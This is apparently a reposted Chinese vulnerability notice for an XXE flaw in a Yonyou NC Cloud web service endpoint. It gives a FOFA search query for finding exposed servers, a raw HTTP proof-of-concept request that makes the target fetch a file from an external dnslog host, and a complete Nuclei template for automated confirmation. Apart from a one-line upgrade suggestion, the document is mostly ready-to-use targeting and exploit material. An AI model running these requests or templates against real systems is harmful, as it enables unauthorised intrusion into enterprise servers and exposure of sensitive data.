免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
Ⅱ、fofa语句
body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
Ⅲ、漏洞复现
POC
GET /uapws/service/nc.itf.tb.oba.INtbOBAWebService?xsd=http://pwmguqyets.dgrh3.cn/win2.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Accept: text/plain, */*; q=0.01
Cache-Control: no-cache
Pragma: no-cache
Accept-Encoding: gzip
1、构造数据包,访问dnslog
2、查看DNSlog记录
Ⅳ、Nuclei-POC
id: yonyou-U8-INtbOBAWebService-xml
info:
name: 该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
author: WLF
severity: high
metadata:
fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
GET /uapws/service/nc.itf.tb.oba.INtbOBAWebService?xsd=http://{{interactsh-url}}/win2.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Accept: text/plain, */*; q=0.01
Cache-Control: no-cache
Pragma: no-cache
Accept-Encoding: gzip
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
Ⅴ、修复建议
升级至安全版本